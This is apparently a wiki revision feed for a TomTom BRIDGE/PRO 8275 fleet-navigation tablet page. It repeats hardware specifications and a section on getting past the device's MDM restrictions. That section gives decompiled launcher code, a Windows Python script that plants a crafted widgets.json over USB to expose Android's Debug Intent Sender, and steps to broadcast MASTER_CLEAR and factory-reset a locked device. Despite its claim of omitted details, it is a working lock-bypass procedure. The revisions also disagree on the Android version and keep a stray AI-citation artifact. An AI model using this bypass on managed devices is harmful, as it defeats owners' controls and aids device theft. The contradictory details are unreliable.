Testing on the PRO 8275 (Android 4.3 14 Jun 2017 kernel patches) indicated that:&lt;br /&gt;
* Certain preinstalled or privileged applications expose functionality that can be accessed via &amp;lt;code&amp;gt;createPackageContext()&amp;lt;/code&amp;gt;&lt;br /&gt;
* In some cases, access controls appeared weaker than expected for a hardened enterprise deployment&lt;br /&gt;
* The behavior may allow interaction with components or resources outside the normal application sandbox&lt;br /&gt;
&lt;br /&gt;
===== Proof of concept (high-level demonstration) =====&lt;br /&gt;
This demonstration is intentionally limited and omits exploit details. It is intended to validate behavior in a controlled research environment only.&lt;br /&gt;
&lt;br /&gt;
Weakness in the system is the widget.json fechter from Internal storage.&amp;lt;/br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
com.tomtom.navpad.widgetorganizerlib.WidgetInfoFetcher.fetchInstalledWidgets&amp;lt;/br&amp;gt;&lt;br /&gt;
and&amp;lt;/br&amp;gt;&lt;br /&gt;
com.tomtom.navpad.widgetorganizerlib.WidgetInfoFetcher.fetchInstalledApplications&amp;lt;/br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;java&amp;quot;&amp;gt;&lt;br /&gt;
    private void fetchInstalledApplications(Context context, boolean showTestapps) {&lt;br /&gt;
        Drawable iconDrawable;&lt;br /&gt;
        if (!$assertionsDisabled &amp;amp;&amp;amp; context == null) {&lt;br /&gt;
            throw new AssertionError();&lt;br /&gt;
        }&lt;br /&gt;
        if (mAppShortcutsInfoCachedList != null) {&lt;br /&gt;
            this.mWidgetInfoList.addAll(mAppShortcutsInfoCachedList);&lt;br /&gt;
            generateWidgetInfoMap();&lt;br /&gt;
            return;&lt;br /&gt;
        }&lt;br /&gt;
        Resources resources = context.getResources();&lt;br /&gt;
        ArrayList&amp;lt;CachedActivityInfo&amp;gt; apps = createAppList(context, showTestapps);&lt;br /&gt;
        int widgetIndex = 0;&lt;br /&gt;
        for (CachedActivityInfo app : apps) {&lt;br /&gt;
            ActivityInfo activityInfo = app.getActivityInfo();&lt;br /&gt;
            String appPackageName = activityInfo.packageName;&lt;br /&gt;
            String appClassName = activityInfo.name;&lt;br /&gt;
            if (!NAVAPP_PACKAGE_NAME.equals(appPackageName) || !&amp;quot;com.tomtom.navpad.navapp.NavPadAppDrawerActivity&amp;quot;.equals(appClassName)) {&lt;br /&gt;
                if (this.mIsConfigurable || !NAVAPP_PACKAGE_NAME.equals(appPackageName) || !&amp;quot;com.tomtom.navpad.navapp.NavPadWidgetDrawerActivity&amp;quot;.equals(appClassName)) {&lt;br /&gt;
                    int pageIndex = widgetIndex / 8;&lt;br /&gt;
                    int widgetIndexOnPage = widgetIndex % 8;&lt;br /&gt;
                    WidgetInfo wInfo = new WidgetInfo();&lt;br /&gt;
                    wInfo.setWidgetType(WidgetInfo.WidgetType.APPSHORTCUT);&lt;br /&gt;
                    wInfo.setIsFromDrawer(true);&lt;br /&gt;
                    wInfo.setId(widgetIndex + 1);&lt;br /&gt;
                    wInfo.setPackageName(appPackageName);&lt;br /&gt;
                    wInfo.setClassName(appClassName);&lt;br /&gt;
                    wInfo.setPageNumber(pageIndex + 1);&lt;br /&gt;
                    wInfo.setEnabled(true);&lt;br /&gt;
                    wInfo.setLayoutColumn(widgetIndexOnPage % 4);&lt;br /&gt;
                    wInfo.setLayoutRow(widgetIndexOnPage / 4);&lt;br /&gt;
                    wInfo.setBackgroundColor(resources.getColor(R.color.navpad_homescreen_background_color));&lt;br /&gt;
                    wInfo.setTextColor(resources.getColor(R.color.navpad_homescreen_appshortcut_text_color));&lt;br /&gt;
                    wInfo.setName(app.getLabel());&lt;br /&gt;
                    try {&lt;br /&gt;
                        Context otherAppCtx = context.createPackageContext(appPackageName, 2);&lt;br /&gt;
                        iconDrawable = otherAppCtx.getResources().getDrawableForDensity(activityInfo.getIconResource(), 320);&lt;br /&gt;
                    } catch (PackageManager.NameNotFoundException e) {&lt;br /&gt;
                        if (Log.W) {&lt;br /&gt;
                            Log.w(TAG, &amp;quot;Could not find package &amp;quot; + appPackageName + &amp;quot; to fetch larger icon.&amp;quot;);&lt;br /&gt;
                        }&lt;br /&gt;
                        iconDrawable = activityInfo.loadIcon(context.getPackageManager());&lt;br /&gt;
                    } catch (Resources.NotFoundException e2) {&lt;br /&gt;
                        if (Log.W) {&lt;br /&gt;
                            Log.w(TAG, &amp;quot;Could not fetch xhdpi icon from package &amp;quot; + appPackageName + &amp;quot; reverting to default icon.&amp;quot;);&lt;br /&gt;
                        }&lt;br /&gt;
                        iconDrawable = activityInfo.loadIcon(context.getPackageManager());&lt;br /&gt;
                    }&lt;br /&gt;
                    wInfo.setIconDrawable(iconDrawable);&lt;br /&gt;
                    this.mWidgetInfoList.add(wInfo);&lt;br /&gt;
                    widgetIndex++;&lt;br /&gt;
                }&lt;br /&gt;
            }&lt;br /&gt;
        }&lt;br /&gt;
        generateWidgetInfoMap();&lt;br /&gt;
        mAppShortcutsInfoCachedList = this.mWidgetInfoList;&lt;br /&gt;
    }&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Start the tablet in MDM mode or admin locked restricted mode. Start the '''PoC python script''' when the tablet is connected to the computer by MicroUSB wire and when a error occurs on the screen the code executed succesfully. Now press ok and swipe to left on the home screen and now you see '''Debug Intent Sender''', open it and fill in the action textbox '''&amp;quot;android.intent.action.MASTER_CLEAR&amp;quot;''' now press send broadcast and your locked device is '''factory reset'''.&lt;br /&gt;
&lt;br /&gt;
PoC script (Windows only, pymtp on Linux is a incomplete fork and does not work).&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;python&amp;quot;&amp;gt;&lt;br /&gt;
import os&lt;br /&gt;
import json&lt;br /&gt;
import time&lt;br /&gt;
import win32com.client&lt;br /&gt;
&lt;br /&gt;
OUTPUT_FILE = &amp;quot;widgets.json&amp;quot;&lt;br /&gt;
&lt;br /&gt;
JSON_DATA = {&lt;br /&gt;
    &amp;quot;application&amp;quot;: [&lt;br /&gt;
        {&lt;br /&gt;
            &amp;quot;package_name&amp;quot;: &amp;quot;com.android.settings&amp;quot;,&lt;br /&gt;
            &amp;quot;class_name&amp;quot;: &amp;quot;com.android.settings.DebugIntentSender&amp;quot;,&lt;br /&gt;
            &amp;quot;startcell&amp;quot;: &amp;quot;2.11&amp;quot;,&lt;br /&gt;
            &amp;quot;endcell&amp;quot;: &amp;quot;2.11&amp;quot;&lt;br /&gt;
        }&lt;br /&gt;
    ]&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
with open(OUTPUT_FILE, &amp;quot;w&amp;quot;) as f:&lt;br /&gt;
    json.dump(JSON_DATA, f, indent=4)&lt;br /&gt;
&lt;br /&gt;
shell = win32com.client.Dispatch(&amp;quot;Shell.Application&amp;quot;)&lt;br /&gt;
my_computer = shell.NameSpace(17)&lt;br /&gt;
&lt;br /&gt;
tomtom_device = None&lt;br /&gt;
for item in my_computer.Items():&lt;br /&gt;
    if &amp;quot;tomtom&amp;quot; in item.Name.lower():&lt;br /&gt;
        tomtom_device = item&lt;br /&gt;
        break&lt;br /&gt;
&lt;br /&gt;
if not tomtom_device:&lt;br /&gt;
    print(&amp;quot;TomTom device not found.&amp;quot;)&lt;br /&gt;
    exit(1)&lt;br /&gt;
&lt;br /&gt;
device_root = tomtom_device.GetFolder&lt;br /&gt;
&lt;br /&gt;
device_root.CopyHere(os.path.abspath(OUTPUT_FILE))&lt;br /&gt;
time.sleep(2)&lt;br /&gt;
&lt;br /&gt;
print(f&amp;quot;{OUTPUT_FILE} successfully injected DebugIntentSender.&amp;quot;)&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;gallery widths=&amp;quot;120px&amp;quot; heights=&amp;quot;120px&amp;quot; perrow=&amp;quot;3&amp;quot;&amp;gt;&lt;br /&gt;
https://i.ibb.co/0psNg8y4/error-after-injection.jpg|error after injection&lt;br /&gt;
https://i.ibb.co/HTHtyDL0/debugintentsender.jpg|DebugIntentSender class&lt;br /&gt;
https://i.ibb.co/bgZj324Y/broadcast.jpg|broadcast MASTER_CLEAR intent&lt;br /&gt;
&amp;lt;/gallery&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===== Research paper =====&lt;br /&gt;
[[:File:Android createPackageContext Paper 10 5 0.pdf|Android createPackageContext Paper 10 5 0.pdf]]&amp;lt;/br&amp;gt;&lt;br /&gt;
[https://www.ndss-symposium.org/wp-content/uploads/2017/09/10_5_0.pdf Download PDF remote]&lt;br /&gt;
&lt;br /&gt;
===== Disclosure status =====&lt;br /&gt;
This finding is based on internal testing and has not been publicly assigned a CVE at the time of writing.&lt;/div&gt;</summary>
		<author><name>Polymorphic7</name></author>
		
	</entry>
	<entry>
		<id>https://wiki.recessim.com/w/index.php?title=TomTom_BRIDGE_7%22_Truck/Pro_8275_(4FI70)&amp;diff=3295</id>
		<title>TomTom BRIDGE 7&quot; Truck/Pro 8275 (4FI70)</title>
		<link rel="alternate" type="text/html" href="https://wiki.recessim.com/w/index.php?title=TomTom_BRIDGE_7%22_Truck/Pro_8275_(4FI70)&amp;diff=3295"/>
		<updated>2026-04-03T03:18:01Z</updated>

		<summary type="html">&lt;p&gt;Polymorphic7: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Overview ==&lt;br /&gt;
The '''TomTom BRIDGE 7&amp;quot; Truck / PRO 8275 (model 4FI70)''' is a ruggedized, enterprise-grade GPS navigation and telematics device designed for commercial fleet and truck operations. It combines dedicated truck navigation with an open Android-based platform, allowing integration with business applications and fleet management systems such as WEBFLEET.&lt;br /&gt;
&lt;br /&gt;
The device is part of the TomTom BRIDGE ecosystem, which provides customizable in-vehicle hardware for logistics, telematics, and workflow automation.&lt;br /&gt;
&lt;br /&gt;
== Contents ==&lt;br /&gt;
__TOC__&lt;br /&gt;
&lt;br /&gt;
== Product family ==&lt;br /&gt;
* TomTom BRIDGE platform (Android-based in-vehicle terminal)&lt;br /&gt;
* TomTom PRO 8275 Truck (7&amp;quot; driver terminal variant)&lt;br /&gt;
* Model identifiers:&lt;br /&gt;
** 4FI70 (with cellular/GPRS module)&lt;br /&gt;
** 4FI72 / 4FI73 (non-cellular variants)&lt;br /&gt;
&lt;br /&gt;
== Key features ==&lt;br /&gt;
* 7-inch rugged touchscreen display&lt;br /&gt;
* Truck-specific navigation (routes optimized for size, weight, and restrictions)&lt;br /&gt;
* Open Android platform (AOSP-based)&lt;br /&gt;
* Support for custom enterprise applications&lt;br /&gt;
* Integration with fleet management systems (e.g., WEBFLEET)&lt;br /&gt;
* Built-in mobile device management (MDM) capabilities&lt;br /&gt;
* Lifetime maps and navigation services (subject to lifecycle support)&lt;br /&gt;
* Rear camera and vehicle integration support&lt;br /&gt;
&lt;br /&gt;
== Hardware specifications ==&lt;br /&gt;
=== System ===&lt;br /&gt;
* Operating system: Android 6.0.1 (latest update)&lt;br /&gt;
* CPU: Qualcomm Snapdragon 400 (quad-core, 1.2 GHz) &lt;br /&gt;
* RAM: 1.5 GB &lt;br /&gt;
* Storage: 16 GB / 32 GB (expandable via SD card)&lt;br /&gt;
&lt;br /&gt;
=== Display ===&lt;br /&gt;
* Resolution: 1280×720 (720p)&lt;br /&gt;
* Multi-touch capacitive screen &lt;br /&gt;
&lt;br /&gt;
=== Connectivity ===&lt;br /&gt;
* Wi-Fi (2.4 GHz / 5 GHz)&lt;br /&gt;
* Bluetooth 4.0&lt;br /&gt;
* Cellular (model-dependent, e.g., 4FI70 includes GSM/LTE)&lt;br /&gt;
* USB (OTG support)&lt;br /&gt;
* CAN bus interface for vehicle integration&lt;br /&gt;
&lt;br /&gt;
=== Sensors ===&lt;br /&gt;
* GPS / GLONASS GNSS receiver&lt;br /&gt;
* Accelerometer&lt;br /&gt;
* Gyroscope&lt;br /&gt;
&lt;br /&gt;
=== Power ===&lt;br /&gt;
* 8–32V input by docking (compatible with 12V/24V vehicle systems)&lt;br /&gt;
* MicroUSB charging 5v&lt;br /&gt;
&lt;br /&gt;
=== Device I/O ===&lt;br /&gt;
==== Docking connector ====&lt;br /&gt;
* Proprietary multi-pin docking interface&lt;br /&gt;
* Used for:&lt;br /&gt;
** Power delivery (via vehicle dock)&lt;br /&gt;
** CAN bus integration&lt;br /&gt;
** External peripherals (e.g., cameras, telematics modules)&lt;br /&gt;
* Enables fixed in-vehicle installation with secure mounting&lt;br /&gt;
&lt;br /&gt;
==== USB ====&lt;br /&gt;
* Micro-USB port (front-facing)&lt;br /&gt;
* Supports:&lt;br /&gt;
** Device charging&lt;br /&gt;
** Data transfer (MTP/PTP)&lt;br /&gt;
** Android Debug Bridge (ADB) access (if enabled)&lt;br /&gt;
** USB On-The-Go (OTG) for supported peripherals&lt;br /&gt;
&lt;br /&gt;
==== microSD card slot ====&lt;br /&gt;
* Supports microSD / microSDHC cards&lt;br /&gt;
* Used for:&lt;br /&gt;
** Storage expansion (maps, applications, media)&lt;br /&gt;
** Offline data transfer and updates&lt;br /&gt;
&lt;br /&gt;
== Software and platform ==&lt;br /&gt;
The TomTom BRIDGE platform is based on the Android Open Source Project (AOSP), enabling:&lt;br /&gt;
* Installation of custom APK applications&lt;br /&gt;
* Integration with enterprise backends&lt;br /&gt;
* Remote configuration and control via MDM systems&lt;br /&gt;
* Access to standard Android APIs alongside TomTom navigation APIs&lt;br /&gt;
&lt;br /&gt;
TomTom maintains control over firmware and system updates to ensure regulatory compliance and device integrity.&lt;br /&gt;
&lt;br /&gt;
== Lifecycle ==&lt;br /&gt;
Devices in the 4FI70 series have reached end-of-life status but may still receive limited support and updates. :contentReference[oaicite:11]{index=11}&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== Device Administrator / MDM policy privilege escalation ==&lt;br /&gt;
This section is for educational and defensive security research purposes only.&lt;br /&gt;
&lt;br /&gt;
=== Overview ===&lt;br /&gt;
The TomTom BRIDGE platform supports enterprise Mobile Device Management (MDM) and Android Device Administrator APIs. These features allow organizations to:&lt;br /&gt;
* Enforce security policies&lt;br /&gt;
* Control application installation&lt;br /&gt;
* Restrict user actions&lt;br /&gt;
* Remotely manage the device&lt;br /&gt;
&lt;br /&gt;
Because the device runs 4.3 (kernel patched Jun 14 2017), it relies on legacy Device Administrator mechanisms rather than modern Android Enterprise (Device Owner) APIs.&lt;br /&gt;
&lt;br /&gt;
==== createPackageContext misuse (research finding) ====&lt;br /&gt;
During analysis of the TomTom BRIDGE platform, a potential issue was identified related to the use of the Android API method &amp;lt;code&amp;gt;createPackageContext()&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
===== Background =====&lt;br /&gt;
The &amp;lt;code&amp;gt;createPackageContext()&amp;lt;/code&amp;gt; method allows an application to create a context for another installed package. When used with specific flags (e.g., &amp;lt;code&amp;gt;CONTEXT_INCLUDE_CODE&amp;lt;/code&amp;gt; or &amp;lt;code&amp;gt;CONTEXT_IGNORE_SECURITY&amp;lt;/code&amp;gt;), it can enable access to that application's resources or code, depending on system permissions and signature alignment.&lt;br /&gt;
&lt;br /&gt;
This mechanism is typically restricted to:&lt;br /&gt;
* System applications&lt;br /&gt;
* Applications signed with the same certificate&lt;br /&gt;
* Privileged contexts with elevated permissions&lt;br /&gt;
&lt;br /&gt;
===== Observed behavior =====&lt;br /&gt;
Testing on the PRO 8275 (Android 6.0.1) indicated that:&lt;br /&gt;
* Certain preinstalled or privileged applications expose functionality that can be accessed via &amp;lt;code&amp;gt;createPackageContext()&amp;lt;/code&amp;gt;&lt;br /&gt;
* In some cases, access controls appeared weaker than expected for a hardened enterprise deployment&lt;br /&gt;
* The behavior may allow interaction with components or resources outside the normal application sandbox&lt;br /&gt;
&lt;br /&gt;
===== Proof of concept (high-level demonstration) =====&lt;br /&gt;
This demonstration is intentionally limited and omits exploit details. It is intended to validate behavior in a controlled research environment only.&lt;br /&gt;
&lt;br /&gt;
Weakness in the system is the widget.json fechter from Internal storage.&amp;lt;/br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
com.tomtom.navpad.widgetorganizerlib.WidgetInfoFetcher.fetchInstalledWidgets&amp;lt;/br&amp;gt;&lt;br /&gt;
and&amp;lt;/br&amp;gt;&lt;br /&gt;
com.tomtom.navpad.widgetorganizerlib.WidgetInfoFetcher.fetchInstalledApplications&amp;lt;/br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;java&amp;quot;&amp;gt;&lt;br /&gt;
    private void fetchInstalledApplications(Context context, boolean showTestapps) {&lt;br /&gt;
        Drawable iconDrawable;&lt;br /&gt;
        if (!$assertionsDisabled &amp;amp;&amp;amp; context == null) {&lt;br /&gt;
            throw new AssertionError();&lt;br /&gt;
        }&lt;br /&gt;
        if (mAppShortcutsInfoCachedList != null) {&lt;br /&gt;
            this.mWidgetInfoList.addAll(mAppShortcutsInfoCachedList);&lt;br /&gt;
            generateWidgetInfoMap();&lt;br /&gt;
            return;&lt;br /&gt;
        }&lt;br /&gt;
        Resources resources = context.getResources();&lt;br /&gt;
        ArrayList&amp;lt;CachedActivityInfo&amp;gt; apps = createAppList(context, showTestapps);&lt;br /&gt;
        int widgetIndex = 0;&lt;br /&gt;
        for (CachedActivityInfo app : apps) {&lt;br /&gt;
            ActivityInfo activityInfo = app.getActivityInfo();&lt;br /&gt;
            String appPackageName = activityInfo.packageName;&lt;br /&gt;
            String appClassName = activityInfo.name;&lt;br /&gt;
            if (!NAVAPP_PACKAGE_NAME.equals(appPackageName) || !&amp;quot;com.tomtom.navpad.navapp.NavPadAppDrawerActivity&amp;quot;.equals(appClassName)) {&lt;br /&gt;
                if (this.mIsConfigurable || !NAVAPP_PACKAGE_NAME.equals(appPackageName) || !&amp;quot;com.tomtom.navpad.navapp.NavPadWidgetDrawerActivity&amp;quot;.equals(appClassName)) {&lt;br /&gt;
                    int pageIndex = widgetIndex / 8;&lt;br /&gt;
                    int widgetIndexOnPage = widgetIndex % 8;&lt;br /&gt;
                    WidgetInfo wInfo = new WidgetInfo();&lt;br /&gt;
                    wInfo.setWidgetType(WidgetInfo.WidgetType.APPSHORTCUT);&lt;br /&gt;
                    wInfo.setIsFromDrawer(true);&lt;br /&gt;
                    wInfo.setId(widgetIndex + 1);&lt;br /&gt;
                    wInfo.setPackageName(appPackageName);&lt;br /&gt;
                    wInfo.setClassName(appClassName);&lt;br /&gt;
                    wInfo.setPageNumber(pageIndex + 1);&lt;br /&gt;
                    wInfo.setEnabled(true);&lt;br /&gt;
                    wInfo.setLayoutColumn(widgetIndexOnPage % 4);&lt;br /&gt;
                    wInfo.setLayoutRow(widgetIndexOnPage / 4);&lt;br /&gt;
                    wInfo.setBackgroundColor(resources.getColor(R.color.navpad_homescreen_background_color));&lt;br /&gt;
                    wInfo.setTextColor(resources.getColor(R.color.navpad_homescreen_appshortcut_text_color));&lt;br /&gt;
                    wInfo.setName(app.getLabel());&lt;br /&gt;
                    try {&lt;br /&gt;
                        Context otherAppCtx = context.createPackageContext(appPackageName, 2);&lt;br /&gt;
                        iconDrawable = otherAppCtx.getResources().getDrawableForDensity(activityInfo.getIconResource(), 320);&lt;br /&gt;
                    } catch (PackageManager.NameNotFoundException e) {&lt;br /&gt;
                        if (Log.W) {&lt;br /&gt;
                            Log.w(TAG, &amp;quot;Could not find package &amp;quot; + appPackageName + &amp;quot; to fetch larger icon.&amp;quot;);&lt;br /&gt;
                        }&lt;br /&gt;
                        iconDrawable = activityInfo.loadIcon(context.getPackageManager());&lt;br /&gt;
                    } catch (Resources.NotFoundException e2) {&lt;br /&gt;
                        if (Log.W) {&lt;br /&gt;
                            Log.w(TAG, &amp;quot;Could not fetch xhdpi icon from package &amp;quot; + appPackageName + &amp;quot; reverting to default icon.&amp;quot;);&lt;br /&gt;
                        }&lt;br /&gt;
                        iconDrawable = activityInfo.loadIcon(context.getPackageManager());&lt;br /&gt;
                    }&lt;br /&gt;
                    wInfo.setIconDrawable(iconDrawable);&lt;br /&gt;
                    this.mWidgetInfoList.add(wInfo);&lt;br /&gt;
                    widgetIndex++;&lt;br /&gt;
                }&lt;br /&gt;
            }&lt;br /&gt;
        }&lt;br /&gt;
        generateWidgetInfoMap();&lt;br /&gt;
        mAppShortcutsInfoCachedList = this.mWidgetInfoList;&lt;br /&gt;
    }&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Start the tablet in MDM mode or admin locked restricted mode. Start the '''PoC python script''' when the tablet is connected to the computer by MicroUSB wire and when a error occurs on the screen the code executed succesfully. Now press ok and swipe to left on the home screen and now you see '''Debug Intent Sender''', open it and fill in the action textbox '''&amp;quot;android.intent.action.MASTER_CLEAR&amp;quot;''' now press send broadcast and your locked device is '''factory reset'''.&lt;br /&gt;
&lt;br /&gt;
PoC script (Windows only, pymtp on Linux is a incomplete fork and does not work).&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;python&amp;quot;&amp;gt;&lt;br /&gt;
import os&lt;br /&gt;
import json&lt;br /&gt;
import time&lt;br /&gt;
import win32com.client&lt;br /&gt;
&lt;br /&gt;
OUTPUT_FILE = &amp;quot;widgets.json&amp;quot;&lt;br /&gt;
&lt;br /&gt;
JSON_DATA = {&lt;br /&gt;
    &amp;quot;application&amp;quot;: [&lt;br /&gt;
        {&lt;br /&gt;
            &amp;quot;package_name&amp;quot;: &amp;quot;com.android.settings&amp;quot;,&lt;br /&gt;
            &amp;quot;class_name&amp;quot;: &amp;quot;com.android.settings.DebugIntentSender&amp;quot;,&lt;br /&gt;
            &amp;quot;startcell&amp;quot;: &amp;quot;2.11&amp;quot;,&lt;br /&gt;
            &amp;quot;endcell&amp;quot;: &amp;quot;2.11&amp;quot;&lt;br /&gt;
        }&lt;br /&gt;
    ]&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
with open(OUTPUT_FILE, &amp;quot;w&amp;quot;) as f:&lt;br /&gt;
    json.dump(JSON_DATA, f, indent=4)&lt;br /&gt;
&lt;br /&gt;
shell = win32com.client.Dispatch(&amp;quot;Shell.Application&amp;quot;)&lt;br /&gt;
my_computer = shell.NameSpace(17)&lt;br /&gt;
&lt;br /&gt;
tomtom_device = None&lt;br /&gt;
for item in my_computer.Items():&lt;br /&gt;
    if &amp;quot;tomtom&amp;quot; in item.Name.lower():&lt;br /&gt;
        tomtom_device = item&lt;br /&gt;
        break&lt;br /&gt;
&lt;br /&gt;
if not tomtom_device:&lt;br /&gt;
    print(&amp;quot;TomTom device not found.&amp;quot;)&lt;br /&gt;
    exit(1)&lt;br /&gt;
&lt;br /&gt;
device_root = tomtom_device.GetFolder&lt;br /&gt;
&lt;br /&gt;
device_root.CopyHere(os.path.abspath(OUTPUT_FILE))&lt;br /&gt;
time.sleep(2)&lt;br /&gt;
&lt;br /&gt;
print(f&amp;quot;{OUTPUT_FILE} successfully injected DebugIntentSender.&amp;quot;)&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;gallery widths=&amp;quot;120px&amp;quot; heights=&amp;quot;120px&amp;quot; perrow=&amp;quot;3&amp;quot;&amp;gt;&lt;br /&gt;
https://i.ibb.co/0psNg8y4/error-after-injection.jpg|error after injection&lt;br /&gt;
https://i.ibb.co/HTHtyDL0/debugintentsender.jpg|DebugIntentSender class&lt;br /&gt;
https://i.ibb.co/bgZj324Y/broadcast.jpg|broadcast MASTER_CLEAR intent&lt;br /&gt;
&amp;lt;/gallery&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===== Research paper =====&lt;br /&gt;
[[:File:Android createPackageContext Paper 10 5 0.pdf|Android createPackageContext Paper 10 5 0.pdf]]&amp;lt;/br&amp;gt;&lt;br /&gt;
[https://www.ndss-symposium.org/wp-content/uploads/2017/09/10_5_0.pdf Download PDF remote]&lt;br /&gt;
&lt;br /&gt;
===== Disclosure status =====&lt;br /&gt;
This finding is based on internal testing and has not been publicly assigned a CVE at the time of writing.&lt;/div&gt;</summary>
		<author><name>Polymorphic7</name></author>
		
	</entry>
	<entry>
		<id>https://wiki.recessim.com/w/index.php?title=TomTom_BRIDGE_7%22_Truck/Pro_8275_(4FI70)&amp;diff=3294</id>
		<title>TomTom BRIDGE 7&quot; Truck/Pro 8275 (4FI70)</title>
		<link rel="alternate" type="text/html" href="https://wiki.recessim.com/w/index.php?title=TomTom_BRIDGE_7%22_Truck/Pro_8275_(4FI70)&amp;diff=3294"/>
		<updated>2026-04-03T03:17:46Z</updated>

		<summary type="html">&lt;p&gt;Polymorphic7: v1&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;= TomTom BRIDGE 7&amp;quot; Truck / PRO 8275 (4FI70) =&lt;br /&gt;
&lt;br /&gt;
== Overview ==&lt;br /&gt;
The '''TomTom BRIDGE 7&amp;quot; Truck / PRO 8275 (model 4FI70)''' is a ruggedized, enterprise-grade GPS navigation and telematics device designed for commercial fleet and truck operations. It combines dedicated truck navigation with an open Android-based platform, allowing integration with business applications and fleet management systems such as WEBFLEET.&lt;br /&gt;
&lt;br /&gt;
The device is part of the TomTom BRIDGE ecosystem, which provides customizable in-vehicle hardware for logistics, telematics, and workflow automation.&lt;br /&gt;
&lt;br /&gt;
== Contents ==&lt;br /&gt;
__TOC__&lt;br /&gt;
&lt;br /&gt;
== Product family ==&lt;br /&gt;
* TomTom BRIDGE platform (Android-based in-vehicle terminal)&lt;br /&gt;
* TomTom PRO 8275 Truck (7&amp;quot; driver terminal variant)&lt;br /&gt;
* Model identifiers:&lt;br /&gt;
** 4FI70 (with cellular/GPRS module)&lt;br /&gt;
** 4FI72 / 4FI73 (non-cellular variants)&lt;br /&gt;
&lt;br /&gt;
== Key features ==&lt;br /&gt;
* 7-inch rugged touchscreen display&lt;br /&gt;
* Truck-specific navigation (routes optimized for size, weight, and restrictions)&lt;br /&gt;
* Open Android platform (AOSP-based)&lt;br /&gt;
* Support for custom enterprise applications&lt;br /&gt;
* Integration with fleet management systems (e.g., WEBFLEET)&lt;br /&gt;
* Built-in mobile device management (MDM) capabilities&lt;br /&gt;
* Lifetime maps and navigation services (subject to lifecycle support)&lt;br /&gt;
* Rear camera and vehicle integration support&lt;br /&gt;
&lt;br /&gt;
== Hardware specifications ==&lt;br /&gt;
=== System ===&lt;br /&gt;
* Operating system: Android 6.0.1 (latest update)&lt;br /&gt;
* CPU: Qualcomm Snapdragon 400 (quad-core, 1.2 GHz) &lt;br /&gt;
* RAM: 1.5 GB &lt;br /&gt;
* Storage: 16 GB / 32 GB (expandable via SD card)&lt;br /&gt;
&lt;br /&gt;
=== Display ===&lt;br /&gt;
* Resolution: 1280×720 (720p)&lt;br /&gt;
* Multi-touch capacitive screen &lt;br /&gt;
&lt;br /&gt;
=== Connectivity ===&lt;br /&gt;
* Wi-Fi (2.4 GHz / 5 GHz)&lt;br /&gt;
* Bluetooth 4.0&lt;br /&gt;
* Cellular (model-dependent, e.g., 4FI70 includes GSM/LTE)&lt;br /&gt;
* USB (OTG support)&lt;br /&gt;
* CAN bus interface for vehicle integration&lt;br /&gt;
&lt;br /&gt;
=== Sensors ===&lt;br /&gt;
* GPS / GLONASS GNSS receiver&lt;br /&gt;
* Accelerometer&lt;br /&gt;
* Gyroscope&lt;br /&gt;
&lt;br /&gt;
=== Power ===&lt;br /&gt;
* 8–32V input by docking (compatible with 12V/24V vehicle systems)&lt;br /&gt;
* MicroUSB charging 5v&lt;br /&gt;
&lt;br /&gt;
=== Device I/O ===&lt;br /&gt;
==== Docking connector ====&lt;br /&gt;
* Proprietary multi-pin docking interface&lt;br /&gt;
* Used for:&lt;br /&gt;
** Power delivery (via vehicle dock)&lt;br /&gt;
** CAN bus integration&lt;br /&gt;
** External peripherals (e.g., cameras, telematics modules)&lt;br /&gt;
* Enables fixed in-vehicle installation with secure mounting&lt;br /&gt;
&lt;br /&gt;
==== USB ====&lt;br /&gt;
* Micro-USB port (front-facing)&lt;br /&gt;
* Supports:&lt;br /&gt;
** Device charging&lt;br /&gt;
** Data transfer (MTP/PTP)&lt;br /&gt;
** Android Debug Bridge (ADB) access (if enabled)&lt;br /&gt;
** USB On-The-Go (OTG) for supported peripherals&lt;br /&gt;
&lt;br /&gt;
==== microSD card slot ====&lt;br /&gt;
* Supports microSD / microSDHC cards&lt;br /&gt;
* Used for:&lt;br /&gt;
** Storage expansion (maps, applications, media)&lt;br /&gt;
** Offline data transfer and updates&lt;br /&gt;
&lt;br /&gt;
== Software and platform ==&lt;br /&gt;
The TomTom BRIDGE platform is based on the Android Open Source Project (AOSP), enabling:&lt;br /&gt;
* Installation of custom APK applications&lt;br /&gt;
* Integration with enterprise backends&lt;br /&gt;
* Remote configuration and control via MDM systems&lt;br /&gt;
* Access to standard Android APIs alongside TomTom navigation APIs&lt;br /&gt;
&lt;br /&gt;
TomTom maintains control over firmware and system updates to ensure regulatory compliance and device integrity.&lt;br /&gt;
&lt;br /&gt;
== Lifecycle ==&lt;br /&gt;
Devices in the 4FI70 series have reached end-of-life status but may still receive limited support and updates. :contentReference[oaicite:11]{index=11}&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== Device Administrator / MDM policy privilege escalation ==&lt;br /&gt;
This section is for educational and defensive security research purposes only.&lt;br /&gt;
&lt;br /&gt;
=== Overview ===&lt;br /&gt;
The TomTom BRIDGE platform supports enterprise Mobile Device Management (MDM) and Android Device Administrator APIs. These features allow organizations to:&lt;br /&gt;
* Enforce security policies&lt;br /&gt;
* Control application installation&lt;br /&gt;
* Restrict user actions&lt;br /&gt;
* Remotely manage the device&lt;br /&gt;
&lt;br /&gt;
